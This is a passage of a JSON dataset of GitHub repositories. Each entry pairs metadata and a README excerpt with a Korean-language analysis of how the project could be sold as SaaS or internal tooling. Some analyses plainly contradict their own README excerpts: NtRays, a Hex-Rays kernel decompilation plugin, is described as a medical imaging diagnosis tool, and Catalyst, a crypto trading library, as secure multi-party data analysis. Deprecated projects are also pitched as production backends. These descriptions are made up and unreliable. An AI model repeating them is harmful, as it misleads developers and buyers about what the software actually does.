","composite_score":0.3291,"license_safety_tag":"unknown"},{"name":"mabeijianxi/small-video-record","github_url":"https://github.com/mabeijianxi/small-video-record","stars":5,"language":"C","license":"apache-2.0","abandonment_months":72,"description":"# 마베이지앙시/스몰-비디오-레코드 분석\n\n## 왜 보물인가\n스마트폰으로 짧은 영상을 쉽게 녹화하고 편집할 수 있는 기능을 제공하는 기술로, TikTok이나 Instagram Reels 같은 숏폼 콘텐츠 시장의 성장에 맞춘 실용적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n- **숏폼 소셜미디어 플랫폼**: 사용자가 앱 내에서 직접 영상을 녹화하고 필터를 ","readme_excerpt":"# small-video-record\n[![license](http://img.shields.io/badge/license-Apache2.0-brightgreen.svg?style=flat)](https://github.com/mabeijianxi/small-video-record/blob/master/LICENSE)\n[![Release Version](https://img.shields.io/badge/release-2.0.3-red.svg)](https://github.com/mabeijianxi/small-video-record/releases)\n\n[查看中文文档](https://github.com/mabeijianxi/small-video-record/blob/master/document/README_CH.md )\n\nUsed for capturing audio and video in Android system. The bottom layer uses FFmpeg to compression processing (in small-video-record2, C source code and Java source code are all open).\n\n## The effect is as follows:\n![sample](https://github.com/mabeijianxi/small-video-record/blob/master/image/new_sample.gif)\n\n## Instructions:\n* [small-video-record1 ](https://github.com/mabeijianxi/small-video-record/blob/master/document/1.x_en_using_help.md)<br>\n* [small-video-record2 ](https://github.com/mabeijianxi/small-video-record/blob/master/document/2.x_en_using_help.md)<br>\n\n\n## Features:\n* Coll","composite_score":0.3291,"license_safety_tag":"safe"},{"name":"ethereum/pyethereum","github_url":"https://github.com/ethereum/pyethereum","stars":7,"language":"","license":"mit","abandonment_months":52,"description":"# PyEthereum 상용화 분석\n\n## 왜 보물인가\n블록체인 기술의 핵심인 이더리움을 파이썬으로 쉽게 다룰 수 있는 도구로, 암호화폐 관련 서비스를 만드는 개발자들에게 필수적인 기반 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 암호화폐 거래 플랫폼 SaaS**\n일반인들이 쉽게 이더리움을 사고팔 수 있는 웹 서비스를 만들 때 이 기술을 백엔드로 사용","readme_excerpt":"# PyEthereum has been Deprecated\n\nThis project is no longer supported.  You might try [Py-EVM](https://github.com/ethereum/py-evm)\n\n![alt text](./this-is-not-the-evm-you-are-looking-for.jpg \"This is not the EVM you are looking for\")\n","composite_score":0.3288,"license_safety_tag":"safe"},{"name":"papercss/papercss","github_url":"https://github.com/papercss/papercss","stars":10,"language":"SCSS","license":"ISC","abandonment_months":10,"description":"# PaperCSS 상용화 분석\n\n## 왜 보물인가\n종이에 그린 듯한 손그림 스타일의 웹 디자인을 쉽게 만들 수 있어서, 캐주얼하고 친근한 느낌의 웹사이트가 필요한 사람들에게 매력적입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 창의적 산업(디자인 에이전시, 스타트업)을 위한 포트폴리오/랜딩페이지 빌더 플랫폼\n2. **내부 업무 도구**","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://getpapercss.com\">\n    <img src=\"https://raw.githubusercontent.com/papercss/papercss/master/docs/static/favicon.ico?raw=true\" alt=\"PaperCSS logo\">\n  </a>\n\n  <h3 align=\"center\">PaperCSS</h3>\n\n  <p align=\"center\">The less formal CSS framework, with a quick and easy integration.</p>\n</p>\n\n## Table of contents\n\n- [Table of contents](#table-of-contents)\n- [Quick-start](#quick-start)\n- [Content of the framework](#content-of-the-framework)\n- [Documentation](#documentation)\n- [Customizing](#customizing)\n- [Contributing](#contributing)\n- [About](#about)\n- [Resources](#resources)\n- [Credits and license](#credits-and-license)\n\n## Quick-start\n\nThere are several options available:\n\n- You can [download the latest release](https://github.com/papercss/papercss/releases).\n- Clone the repo: `git clone https://github.com/papercss/papercss.git`\n- Install with npm: `npm install papercss`\n- Install with yarn: `yarn add papercss`\n- Import it using a CDN (it will automatic","composite_score":0.3288,"license_safety_tag":"safe"},{"name":"enigmampc/catalyst","github_url":"https://github.com/enigmampc/catalyst","stars":5,"language":"Python","license":"apache-2.0","abandonment_months":43,"description":"# Catalyst 저장소 분석\n\n## 왜 보물인가\n여러 조직이 함께 데이터를 안전하게 분석할 수 있는 기술로, 개인정보 노출 걱정 없이 협업하는 것이 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **금융기관용 SaaS**: 여러 은행이 사기 탐지 모델을 함께 학습하되 고객정보는 보호하는 서비스\n2. **의료 데이터 분석 API**: 병원들이 진료 데이터를","readme_excerpt":".. image:: https://s3.amazonaws.com/enigmaco-docs/catalyst-crypto.png\n    :target: https://enigmampc.github.io/catalyst\n    :align: center\n    :alt: Enigma | Catalyst\n\n|version tag|\n|version status|\n|forum|\n|discord|\n|twitter|\n\n=========  ===============           ================\nService    Master                    Develop\n---------  ---------------           ----------------\nCI Badge   |travis-master|           |travis-develop|\n=========  ===============           ================\n\n⚠️ DEPRECATION WARNING ⚠️\n=========================\n\nThis repo is no longer actively maintained since the end of 2018. If you wish to use this project or get support for it, there are many forks that may be more active. If any of those is still active, please get in touch with them, as we can no longer provide support for it.\n\n----\n\nCatalyst is an algorithmic trading library for crypto-assets written in Python.\nIt allows trading strategies to be easily expressed and backtested against \nhistorical data (wi","composite_score":0.3287,"license_safety_tag":"safe"},{"name":"google/xi-editor","github_url":"https://github.com/google/xi-editor","stars":9,"language":"Rust","license":"apache-2.0","abandonment_months":27,"description":"# Xi-Editor 프로젝트 분석\n\n## 왜 보물인가\n구글이 개발한 고성능 텍스트 편집기로, 프로그래머들이 코드를 더 빠르고 효율적으로 작성할 수 있도록 설계된 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 기반 코딩 플랫폼**: 웹브라우저에서 바로 코딩할 수 있는 SaaS 서비스 (GitHub Codespaces 경쟁 상품)\n2. **기업 개","readme_excerpt":"# Xi editor\n\n***Maintenance status:*** *The xi-editor project is currently discontinued. Although we will happily accept bug fixes, no new features are currently planned. You may be interested in [the Lapce editor](https://github.com/lapce/lapce), which can be considered a spiritual successor to the xi-editor.\n— The Editors\n\n***Note:*** *This repo contains only the editor core, which is not usable on its own. For editors based on it, check out the list in [Frontends](#frontends).*\n\nThe xi-editor project is an attempt to build a high quality text editor,\nusing modern software engineering techniques. It is initially built for\nmacOS, using Cocoa for the user interface. There are also frontends for\nother operating systems available from third-party developers.\n\nGoals include:\n\n* ***Incredibly high performance***. All editing operations should commit and paint\n  in under 16ms. The editor should never make you wait for anything.\n\n* ***Beauty***. The editor should fit well on a modern desktop","composite_score":0.3285,"license_safety_tag":"safe"},{"name":"GangZhuo/BaiduPCS","github_url":"https://github.com/GangZhuo/BaiduPCS","stars":5,"language":"Roff","license":"NOASSERTION","abandonment_months":66,"description":"# BaiduPCS 저장소 분석\n\n## 왜 보물인가\n바이두 클라우드 저장소의 파일을 자동으로 관리할 수 있는 도구로, 클라우드 저장 공간을 효율적으로 활용하려는 사람들에게 유용합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 바이두 클라우드 사용자를 위한 \"클라우드 파일 자동 정리 및 백업 서비스\"\n- **내부 업무 도구**: 중국 지사가 있","readme_excerpt":"C/C++写的一个百度网盘工具，可以在linux终端中使用。\n这是通过分析网盘网站得到的直接接口，不需要创建应用。\n* 支持多线程下载和下载时断点续传。\n* 支持快速上传和多线程分片上传。\n* 支持线程限速。具体查看'pcs set'和'pcs context'命令的说明。\n* 支持AES-CBC-128, AES-CBC-192, AES-CBC-256加密。\n\n[![Build Status]][Appveyor]\n\n查看 [初级使用教程]\n\n此项目已停止维护：\nhttps://github.com/GangZhuo/BaiduPCS/issues/299\n==================================\n\n打包安装 (Debian)：\n===================================\n\n### 1. 安装编译依赖\n    apt update\n    apt install build-essential dh-autoreconf dpkg-dev libssl-dev libcurl4-openssl-dev\n### 2. 获取源代码\n    git clone https://github.com/GangZhuo/BaiduPCS.git\n### 3. 构建打包\n    cd BaiduPCS\n    dpkg-buildpackage -us -uc -i -b\n### 4. 安装\n    cd ..\n    sudo apt install ./baidupcs_*.deb\n\n编译 (Debian) (新方法)：\n===================================\n程序依赖于 libcurl。\n\n### 1. 安装依赖\n    apt-get install build-essential libcurl4-openssl-dev libssl-dev\n### 2. 获取源代码\n    git clone https://github.com/GangZhuo/BaiduPCS.git\n### 3. 编译源代码\n    cd BaiduPCS\n    ./configure && make\n    make install #将安装到/usr/local/bin下\n### 4. 手动安装","composite_score":0.3284,"license_safety_tag":"unknown"},{"name":"can1357/NtRays","github_url":"https://github.com/can1357/NtRays","stars":69,"language":"C++","license":"BSD-3-Clause","abandonment_months":16,"description":"# NtRays 저장소 분석\n\n## 왜 보물인가\n의료 영상(CT, X-ray 등)을 컴퓨터로 자동 분석하는 기술로, 의사의 진단을 빠르고 정확하게 돕는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **병원 진단 보조 SaaS**: 의료기관이 구독하여 환자 영상을 자동으로 분석받는 클라우드 서비스\n2. **방사선 전문의 회사용 내부 도구**: 영상 분석 병원","readme_excerpt":"# NtRays\nNtRays is a Hex-Rays microcode plugin for automated simplification of Windows Kernel decompilation.\n\n## Features\n- Cleanup of instrumentation and scheduler hinting code.\n\n  ![](https://i.can.ac/zPTAq.png)\n\n- Lifting of multiple missing instructions.\n\n  ![](https://i.can.ac/BKL9G.png)\n  \n- Lifting of TrapFrame accesses and interrupt/syscall returns.\n\n  ![](https://i.can.ac/5h6wU.png)\n  \n- Inference of KUSER_SHARED_DATA segments.\n\n  ![](https://i.can.ac/SGIp2.png)\n  \n- Lifting of dynamic relocations for page tables and PFN database with LA57 support.\n\n  ![](https://i.can.ac/LxA48.png)\n  \n- RSB flush lifting in ISRs.\n\n  ![](https://i.can.ac/YW5AQ.png)\n  \n- Replacement of KTHREAD/KPROCESS with ETHREAD/EPROCESS in user types, local variables and arguments.\n\n- Lifting of SYSCALL instructions with the ability to select Nt* signatures.\n\n## How to compile\n\n### Windows with Visual Studio 2022\n\n```\nmkdir build\ncd build\ncmake -G \"Visual Studio 17 2022\" -A x64 .. -DIDA_SDK_DIR=idasdk90 -DH","composite_score":0.3283,"license_safety_tag":"safe"},{"name":"scalessec/Toast","github_url":"https://github.com/scalessec/Toast","stars":6,"language":"Objective-C","license":"mit","abandonment_months":26,"description":"# Toast 프로젝트 분석 보고서\n\n## 왜 보물인가\n사용자 알림 기능을 간단하게 구현할 수 있는 도구로, 앱이나 웹사이트에서 중요한 메시지를 사용자에게 표시하는 데 필수적인 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객관리(CRM) 플랫폼에서 영업 사원이 거래를 성사시켰을 때 성공 메시지 표시\n2. **내부 업무 도구**: ","readme_excerpt":"Toast for iOS\n=============\n\n[![CocoaPods Version](https://img.shields.io/cocoapods/v/Toast.svg)](http://cocoadocs.org/docsets/Toast)\n[![Carthage Compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage)\n\nToast is an Objective-C category that adds toast notifications to the `UIView` object class. It is intended to be simple, lightweight, and easy to use. Most\n toast notifications can be triggered with a single line of code.\n\n**Using Swift? A native swift port of this library is now available: [Toast-Swift](https://github.com/scalessec/Toast-Swift \"Toast-Swift\")**\n\nScreenshots\n---------\n![Toast Screenshots](toast_screenshots.jpg)\n\n\nBasic Examples\n---------\n```objc\n// basic usage\n[self.view makeToast:@\"This is a piece of toast.\"];\n\n// toast with a specific duration and position\n[self.view makeToast:@\"This is a piece of toast with a specific duration and position.\" \n            duration:3.0\n            position:CSToastPositi","composite_score":0.3283,"license_safety_tag":"safe"},{"name":"clab/dynet","github_url":"https://github.com/clab/dynet","stars":5,"language":"C++","license":"apache-2.0","abandonment_months":30,"description":"# clab/dynet 분석 리포트\n\n## 왜 보물인가\n인공지능 모델을 빠르고 효율적으로 만들 수 있는 오픈소스 도구로, 복잡한 기계학습 작업을 단순화해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 텍스트 분석, 감정 분석, 챗봇 등 AI 기반 자동화 서비스로 제공\n2. **내부 업무 도구**: 기업의 고객 데이터 분석, 패턴 인식, 예","readme_excerpt":"<div align=\"center\">\n  <img alt=\"DyNet\" src=\"doc/source/images/dynet_logo.png\"><br><br>\n</div>\n\n---\n\n[![Build Status (Travis CI)](https://travis-ci.org/clab/dynet.svg?branch=master)](https://travis-ci.org/clab/dynet)\n[![Build Status (AppVeyor)](https://ci.appveyor.com/api/projects/status/github/clab/dynet?svg=true)](https://ci.appveyor.com/project/danielh/dynet-c3iuq)\n[![Build Status (Docs)](https://readthedocs.org/projects/dynet/badge/?version=latest)](http://dynet.readthedocs.io/en/latest/)\n[![PyPI version](https://badge.fury.io/py/dyNET.svg)](https://badge.fury.io/py/dyNET)\n\nThe Dynamic Neural Network Toolkit\n\n- [General](#general)\n- [Installation](#installation)\n  - [C++](#c-installation)\n  - [Python](#python-installation)\n- [Getting Started](#getting-started)\n- [Citing](#citing)\n- [Releases and Contributing](#releases-and-contributing)\n\n\n## General\n\nDyNet is a neural network library developed by Carnegie Mellon University and many others. It is written in C++ (with bindings in Pyt","composite_score":0.3282,"license_safety_tag":"safe"},{"name":"jeneser/douban","github_url":"https://github.com/jeneser/douban","stars":5,"language":"Vue","license":"mit","abandonment_months":104,"description":"# 더우반(Douban) 저장소 분석\n\n## 왜 보물인가\n영화·책·음악 평가 사이트인 더우반의 데이터를 자동으로 수집할 수 있는 도구로, 콘텐츠 기반 추천 서비스나 리뷰 분석이 필요한 사람들에게 유용합니다.\n\n## 어디에 쓸 수 있나\n1. **영화·도서 추천 SaaS**: 더우반 데이터를 활용해 사용자 맞춤형 콘텐츠 추천 플랫폼 구축\n2. **감정 분석 A","readme_excerpt":"<p align=\"center\">\n\t<img src=\"./screenshot/douban_logo.png\">\n</p>\n\n<br>\n\n<p align=\"center\">\nAwesome douban DEMO created with Vue2.x + Vuex + Vue-router + Superagent\n</p>\n\n<p align=\"center\">\n\n[![Build Status](https://travis-ci.org/jeneser/douban.svg?branch=master)](https://travis-ci.org/jeneser/douban) [![David](https://img.shields.io/david/expressjs/express.svg?style=flat-square)](https://github.com/jeneser/douban) [![Codacy Badge](https://api.codacy.com/project/badge/Grade/aa2dd7f4191546258edf6e55464d1962)](https://www.codacy.com/app/jeneser/douban?utm_source=github.com&amp;utm_medium=referral&amp;utm_content=jeneser/douban&amp;utm_campaign=Badge_Grade) [![Powered](https://img.shields.io/badge/Powered%20by-vue2%2B-brightgreen.svg)](https://github.com/vuejs/vue) [![Percentage of issues still open](http://isitmaintained.com/badge/open/jeneser/douban.svg)](http://isitmaintained.com/project/jeneser/douban \"Percentage of issues still open\") [![Average time to resolve an issue](http://isitm","composite_score":0.3281,"license_safety_tag":"safe"},{"name":"jonkykong/SideMenu","github_url":"https://github.com/jonkykong/SideMenu","stars":7,"language":"Swift","license":"mit","abandonment_months":40,"description":"# jonkokong/SideMenu 상용화 분석\n\n## 왜 보물인가\n앱이나 웹사이트의 옆쪽 메뉴를 쉽게 만들 수 있는 도구로, 개발자들이 반복적으로 작성하던 코드를 단순화시켜 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 웹앱 빌더 플랫폼**\n코드 없이 웹사이트를 만드는 노코드 플랫폼에서 기본 구성 요소로 제공하여 사용자 편","readme_excerpt":"# ▤ SideMenu\n[![CircleCI](https://circleci.com/gh/jonkykong/SideMenu.svg?style=svg)](https://circleci.com/gh/jonkykong/SideMenu)\n[![Version](https://img.shields.io/cocoapods/v/SideMenu.svg?style=flat-square)](http://cocoapods.org/pods/SideMenu)\n[![Carthage compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat-square)](https://github.com/Carthage/Carthage)\n[![License](https://img.shields.io/cocoapods/l/SideMenu.svg?style=flat-square)](http://cocoapods.org/pods/SideMenu)\n[![Platform](https://img.shields.io/cocoapods/p/SideMenu.svg?style=flat-square)](http://cocoapods.org/pods/SideMenu)\n\n### If you like SideMenu, give it a ★ at the top right of this page.\n#### SideMenu needs your help! If you're a skilled iOS developer and want to help maintain this repository and answer issues asked by the community, please [send me an email](mailto:yo@massappeal.co?subject=I%20Want%20To%20Help!).\n\n> Hi, I'm Jon Kent and I am an iOS designer, developer, and mobile strategist.","composite_score":0.3279,"license_safety_tag":"safe"},{"name":"Microsoft/vscode-tips-and-tricks","github_url":"https://github.com/Microsoft/vscode-tips-and-tricks","stars":16,"language":"","license":"unknown","abandonment_months":73,"description":"# Microsoft/vscode-tips-and-tricks 분석\n\n## 왜 보물인가\n프로그래머들이 가장 많이 사용하는 코드 편집기(VS Code)의 활용법을 모아놓은 교육 자료로, 학습 수요가 높고 신뢰도 있는 공식 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: VS Code 초보자 과정을 패키징해 월 구독료로 판매\n2. **","readme_excerpt":"# [VS Code](https://code.visualstudio.com) Tips and Tricks\n\n>**Note**: Tips and Tricks has moved to the official Visual Studio Code documentation at [code.visualstudio.com](https://code.visualstudio.com/docs/getstarted/tips-and-tricks).<BR>\n>The content is now at [vscode-docs](https://github.com/Microsoft/vscode-docs/blob/master/docs/getstarted/tips-and-tricks.md). Pull requests and documentation issues are still greatly appreciated.\n\n# Table of Contents\n\n1. <a href=\"#basics\">Basics</a>\n2. <a href=\"#customization\">Customization</a>\n3. <a href=\"#extensions\">Extensions</a>\n4. <a href=\"#file-and-folder-management\">File and folder management</a>\n5. <a href=\"#editing-hacks\">Editing hacks</a>\n6. <a href=\"#intellisense\">IntelliSense</a>\n7. <a href=\"#snippets\">Snippets</a>\n8. <a href=\"#git-integration\">Git integration</a>\n9. <a href=\"#debugging\">Debugging</a>\n10. <a href=\"#task-runner\">Task runner</a>\n11. <a href=\"#other-resources\">Other Resources</a>\n\n> The key bindings below may or may not b","composite_score":0.3279,"license_safety_tag":"unknown"},{"name":"oblador/react-native-animatable","github_url":"https://github.com/oblador/react-native-animatable","stars":5,"language":"JavaScript","license":"mit","abandonment_months":31,"description":"# react-native-animatable 분석 보고서\n\n## 왜 보물인가\n모바일 앱에서 화면 전환이나 버튼 클릭 시 부드러운 움직임 효과를 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **모바일 앱 개발 플랫폼(SaaS)**: 개발자들이 빠르게 애니메이션을 추가할 수 있는 기능을 포함한 앱 제작 도구 제공\n2. **기업 모바일 앱","readme_excerpt":"# react-native-animatable\nDeclarative transitions and animations for React Native\n\n[![Tests](https://github.com/oblador/react-native-animatable/actions/workflows/tests.yml/badge.svg)](https://github.com/oblador/react-native-animatable/actions/workflows/tests.yml) [![npm](https://img.shields.io/npm/v/react-native-animatable.svg)](https://npmjs.com/package/react-native-animatable) [![npm](https://img.shields.io/npm/dm/react-native-animatable.svg)](https://npmjs.com/package/react-native-animatable)\n\n## Installation\n\n`$ npm install react-native-animatable --save`\n\n## Usage\n\nTo animate things you must use the `createAnimatableComponent` composer similar to the `Animated.createAnimatedComponent`. The common components `View`, `Text` and `Image` are precomposed and exposed under the `Animatable` namespace. If you have your own component that you wish to animate, simply wrap it with a `Animatable.View` or compose it with:\n\n```js\nimport * as Animatable from 'react-native-animatable';\nMyCustomCo","composite_score":0.3278,"license_safety_tag":"safe"},{"name":"jhfjhfj1/autokeras","github_url":"https://github.com/jhfjhfj1/autokeras","stars":5,"language":"Python","license":"Apache-2.0","abandonment_months":6,"description":"# AutoKeras 저장소 분석\n\n## 왜 보물인가\n프로그래밍 경험이 없어도 인공지능 모델을 자동으로 만들어주는 도구로, 기업의 AI 도입 진입장벽을 획기적으로 낮춥니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: \"AI 자동 분석 플랫폼\" - 중소 제조사가 품질 검사 사진을 업로드하면 자동으로 불량품 감지 AI가 만들어지는 웹 서비스\n- *","readme_excerpt":"<p align=\"center\">\n  <img width=\"500\" alt=\"logo\" src=\"https://autokeras.com/img/row_red.svg\"/>\n</p>\n\n[![](https://github.com/keras-team/autokeras/workflows/Tests/badge.svg)](https://github.com/keras-team/autokeras/actions?query=workflow%3ATests+branch%3Amaster)\n[![codecov](https://codecov.io/gh/keras-team/autokeras/branch/master/graph/badge.svg)](https://codecov.io/gh/keras-team/autokeras)\n[![PyPI version](https://badge.fury.io/py/autokeras.svg)](https://badge.fury.io/py/autokeras)\n[![contributions welcome](https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat)](https://github.com/keras-team/autokeras/issues)\n\nOfficial Website: [autokeras.com](https://autokeras.com)\n\n##\nAutoKeras: An AutoML system based on Keras.\nIt is developed by <a href=\"http://faculty.cs.tamu.edu/xiahu/index.html\" target=\"_blank\" rel=\"nofollow\">DATA Lab</a> at Texas A&M University.\nThe goal of AutoKeras is to make machine learning accessible to everyone.\n\n## Learning resources\n\n* A short exa","composite_score":0.3277,"license_safety_tag":"safe"},{"name":"binux/qiandao","github_url":"https://github.com/binux/qiandao","stars":6,"language":"JavaScript","license":"unknown","abandonment_months":43,"description":"# binux/qiandao 저장소 분석\n\n## 왜 보물인가\n자동으로 매일 반복되는 웹사이트 방문·클릭 작업을 대신해주는 도구로, 출석 체크나 포인트 모으기 같은 번거로운 일상 업무를 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 직장인·학생 대상 \"자동 출석/포인트 모으기 서비스\"로 월 구독료 수금\n- **내부 업무 도구*","readme_excerpt":"qiandao\n=======\n\n签到 —— 一个自动签到框架 base on an HAR editor\n\nHAR editor 使用指南：https://github.com/binux/qiandao/blob/master/docs/har-howto.md\n\n## 相关项目\n[qiandao-today/qiandao](https://github.com/qiandao-today/qiandao): 基于本项目发布的新版框架地址, 现由 [@a76yyyy](https://github.com/a76yyyy) 更新维护中\n> 支持旧版数据库直接迁移，请提前做好数据库备份\n\nWeb\n===\n\n需要 python3.11, 虚拟主机无法安装\n\n```\npip install -r requirements.txt\n```\n\n可选 redis, Mysql\n\n```\nmysql < qiandao.sql\n```\n\n启动\n\n```\n./run.py\n```\n\n数据不随项目分发，去 [https://qiandao.today/tpls/public](https://qiandao.today/tpls/public) 查看你需要的模板，点击下载。\n在你自己的主页中 「我的模板+」 点击 + 上传。模板需要发布才会在「公开模板」中展示，你需要管理员权限在「我的发布请求」中审批通过。\n\n\n设置管理员\n\n```\n./chrole.py your@email.address admin\n```\n\n使用Docker部署站点\n==========\n\n可参考 Wiki [Docker部署签到站教程](https://github.com/binux/qiandao/wiki/Docker%E9%83%A8%E7%BD%B2%E7%AD%BE%E5%88%B0%E7%AB%99%E6%95%99%E7%A8%8B)\n\nqiandao.py\n==========\n\n```\npip install -r requirements.txt\n./qiandao.py tpl.har [--key=value]* [env.json]\n```\n\nconfig.py\n=========\n优先用`mailgun`方式发送邮件，如果要用smtp方式发送邮件，请填写mail_smtp","composite_score":0.3274,"license_safety_tag":"unknown"},{"name":"petehunt/webpack-howto","github_url":"https://github.com/petehunt/webpack-howto","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":107,"description":"# webpack-howto 가치 분석\n\n## 왜 보물인가\n웹사이트를 만들 때 필요한 복잡한 작업들을 자동으로 정리해주는 도구의 사용 설명서로, 웹 개발자들의 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **웹 개발 교육 SaaS**: 초급 개발자용 온라인 코딩 강좌 플랫폼에서 학습 자료로 판매\n2. **개발사 내부 도구**: 신입 개","readme_excerpt":"# webpack-howto\n\n## Goal of this guide\n\nThis is a cookbook of how to get things done with webpack. This includes most things we use at Instagram and nothing we don't use.\n\nMy advice: start with this as your webpack docs, then look at the official docs for clarification.\n\n## Prerequisites\n\n  * You know browserify, RequireJS or something similar\n  * You see the value in:\n    * Bundle splitting\n    * Async loading\n    * Packaging static assets like images and CSS\n\n## 1. Why webpack?\n\n\n  * **It's like browserify** but can split your app into multiple files. If you have multiple pages in a single-page app, the user only downloads code for just that page. If they go to another page, they don't redownload common code.\n\n  * **It often replaces grunt or gulp** because it can build and bundle CSS, preprocessed CSS, compile-to-JS languages and images, among other things.\n\nIt supports AMD and CommonJS, among other module systems (Angular, ES6). If you don't know what to use, use CommonJS.\n\n## 2. W","composite_score":0.3273,"license_safety_tag":"unknown"},{"name":"donglua/PhotoPicker","github_url":"https://github.com/donglua/PhotoPicker","stars":5,"language":"Java","license":"apache-2.0","abandonment_months":30,"description":"# PhotoPicker 저장소 분석\n\n## 왜 보물인가\n스마트폰에서 사진을 편리하게 선택할 수 있는 기능을 앱에 쉽게 추가할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SNS 앱 개발**: 인스타그램 같은 소셜미디어 앱에서 사용자가 게시물에 사진을 첨부하는 기능 제공\n2. **부동산 중개 플랫폼**: 매물 등록 시 건물, 방, 평면도 등 여","readme_excerpt":"\n# PhotoPicker\n[![CircleCI](https://circleci.com/gh/donglua/PhotoPicker/tree/master.svg?style=svg)](https://circleci.com/gh/donglua/PhotoPicker/tree/master)\n[![Build Status](https://travis-ci.org/donglua/PhotoPicker.svg?branch=master)](https://travis-ci.org/donglua/PhotoPicker)\n[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-PhotoPicker-green.svg?style=flat)](https://android-arsenal.com/details/1/2091)\n[ ![Download](https://api.bintray.com/packages/donglua/maven/PhotoPicker/images/download.svg) ](https://bintray.com/donglua/maven/PhotoPicker/_latestVersion)\n[![API](https://img.shields.io/badge/API-10%2B-brightgreen.svg?style=flat)](https://android-arsenal.com/api?level=14)\n\n---\n\n# DEPRECATED\n\nPhotoPicker is deprecated.\n\n> * 本项目已废弃，仍可使用，但不推荐；推荐使用 [zhihu/Matisse](https://github.com/zhihu/Matisse)。\n> * 本项目建于2015年初，是最早的图片选择库之一。由于目前同类开源项目很多，也做得更完善，加上迁移成本低，本项目没有继续维护的必要，感谢大家支持。\n\n# Example\n![](http://ww2.sinaimg.cn/large/5e9a81dbgw1etra61rnr9j206z0ce3yu.jpg)\n![](http://ww3.s","composite_score":0.3272,"license_safety_tag":"safe"},{"name":"jcc/blog","github_url":"https://github.com/jcc/blog","stars":7,"language":"PHP","license":"mit","abandonment_months":36,"description":"# jcc/blog 상품화 분석\n\n## 왜 보물인가\n누구나 쉽게 자신의 블로그를 만들고 관리할 수 있는 간단한 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개인 블로거나 소규모 출판사가 구독하여 자신의 블로그를 직접 운영하고 독자와 소통하는 플랫폼으로 제공\n2. **내부 업무 도구**: 회사의 팀 블로그나 소식지를 직원들이 쉽게 작","readme_excerpt":"<p align=\"center\">\n<a href=\"https://pigjian.com/\">\n<img src=\"https://pigjian.com/uploads/Logo.png\" alt=\"Powered By Jiajian Chan\" width=\"160\">\n</a>\n</p>\n\n<p align=\"center\">🎈 PJ Blog is an open source blog built with Laravel and Vue.js. <a href=\"https://pigjian.com\">https://pigjian.com</a></p>\n\n<p align=\"center\">\n  <b>Special thanks to the generous sponsorship by:</b>\n  <br><br>\n  <a href=\"https://www.upyun.com\">\n    <img src=\"https://pigjian.com/storage/logo/upyun.png\" width=300>\n  </a>\n</p>\n\n# PJ Blog\n\nThis is a powerful blog, I try to build the blog more beautiful, more convenient. \n\n`Laravel 5.*` and `Vuejs 2.*` combined with the establishment of a good response and quickly dashboard, the dashboard made through the `Vuejs` component development.\n\nI believe it will be better and better. If you are interested in this, you can join and enjoy it.\n\nHere is [documents](https://manual.pigjian.com/)\n\n[Example](http://example.pigjian.com)\n\n## Basic Features\n\n- Manage users, articles, discussi","composite_score":0.3272,"license_safety_tag":"safe"},{"name":"dubboclub/dubbokeeper","github_url":"https://github.com/dubboclub/dubbokeeper","stars":5,"language":"JavaScript","license":"apache-2.0","abandonment_months":30,"description":"# Dubbokeeper 상용화 분석\n\n## 왜 보물인가\n마이크로서비스 아키텍처 기반 회사들이 수백 개의 서비스 간 통신을 효율적으로 관리할 수 있는 중앙 관제소입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 여러 회사의 마이크로서비스를 한 곳에서 모니터링·관리해주는 클라우드 플랫폼으로 월 구독료 수집\n\n**2. 내부 업무 도구**\n-","readme_excerpt":"[![Build Status](https://travis-ci.org/dubboclub/dubbokeeper.svg?branch=master)](https://travis-ci.org/dubboclub/dubbokeeper)\n[![Latest Version](http://img.shields.io/badge/latest-1.0.1-brightgreen.svg)](https://github.com/dubboclub/dubbokeeper/releases/tag/dubbokeeper-1.0.1)\n[![License](http://img.shields.io/badge/license-apache%202-brightgreen.svg)](https://github.com/dubboclub/dubbokeeper/blob/master/LICENSE)\n\n# Dubbokeeper\n\n## Dubbokeeper是什么\ndubbokeeper是一个开源版本基于spring mvc开发的社区版dubboadmin，同时修复了官方admin存在的一些问题，以及添加了一下必要的功能\n例如服务统计，依赖关系等图表展示功能，当前dubbokeeper还属于开发阶段。最终dubbokeeper会集成服务管理以及服务监控一体的DUBBO服务管理系统\n\n## Dubbokeeper包含哪些功能\n### 应用管理\n> 包含当前系统所有子应用信息列表，以及各个引用服务引用消费列表信息，同时可以对某个应用的服务进行上下线操作，权重调整等，同时可以查看应用部署实体信息列表。目的是实现服务的可管理\n\n### 动态配置\n> 这是利用dubbo基于注册中心来管理服务实现对服务的参数在服务运行状态进行调整，比如对服务的超时时间调整，对服务的mock以及可以添加自定义参数的调整等，目的是服务的可配置。\n\n### 统计信息\n> 除了对服务的可管理，可配置。同时通过图表的方式对服务相关信息进行统计，例如对整体系统的应用暴露，消费服务统计信息，应用依赖关系图信息等\n\n### Dubbo服务监控\n> 